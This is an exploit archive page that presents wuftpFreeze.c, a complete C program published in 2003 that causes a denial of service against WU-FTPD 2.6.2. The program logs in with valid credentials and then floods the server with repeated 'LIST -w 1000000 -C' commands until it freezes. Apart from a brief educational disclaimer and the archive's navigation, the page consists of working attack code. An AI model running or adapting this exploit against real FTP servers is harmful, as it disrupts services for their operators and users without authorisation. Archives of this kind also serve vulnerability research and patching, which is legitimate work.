wuftpFreeze.c

wuftpFreeze.c: Posted Nov 4, 2003; Authored by Angelo Rosiello, rosiello | Site rosiello.org; WU-FTPD 2.6.2 Freezer exploit that causes a denial of service condition when a valid login can be supplied.; tags | denial of service; SHA-256 | d57268686dfb20a4d79703d2f4cddddcc0beb590b3039fcef7b38a2089a03dad; Download | Favorite | View

wuftpFreeze.c



http://www.rosiello.org
Vulnerabilities Section.


/*
*
*                 http://www.rosiello.org
*                  (c) Rosiello Security
*
* Copyright Rosiello Security 2003
* All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail  : angelo@rosiello.org
* URL   : http://www.rosiello.org
*
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

void addr_initialize( );
void usage( );

int main( int argc, char **argv )
{
  int i, sd, PORT, loop, error;
  char user[30], password[30], ch;
  struct sockaddr_in server_addr;

        fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
        fprintf( stdout, "http://www.rosiello.org\n" );
        fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

  if( argc != 6 ) usage( argv[0] );

  if( strlen( argv[3] ) > 20 ) exit( 0 );
  if( strlen( argv[4] ) > 20 ) exit( 0 );

  sprintf( user, "USER %s\n", argv[3] );
  sprintf( password, "PASS %s\n", argv[4] );

  PORT = atoi( argv[2] );
  loop = atoi( argv[5] );

  addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
  sd = socket( AF_INET, SOCK_STREAM, 0 );

    error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
  if( error != 0 )
  {
    perror( "Something wrong with the connection" );
    exit( 0 );
  }

  while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

  ch = '\0';

  printf( "Connection executed, now waiting to log in...\n" );

  printf( "%s", user );

  send( sd, user, strlen( user ), 0 );
  while ( ch != '\n' )
  {
    recv( sd, &ch, 1, 0);
    printf("%c", ch );
  }
  printf( "%s", password );

  ch = '\0';

   send( sd, password, strlen( password ), 0 );
        while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

  printf( "Sending the DoS query\n" );
  for( i=0; i<loop; i++ )
  {
    write( sd, "LIST -w 1000000 -C\n", 19 );
  }
  printf( "All done\n" );
  close( sd );
  return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
       address -> sin_family = AF_INET;
       address -> sin_port = htons((u_short)port);
       address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
  fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
    exit(0);
}

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

wuftpFreeze.c

wuftpFreeze.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

wuftpFreeze.c

Share This

wuftpFreeze.c

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems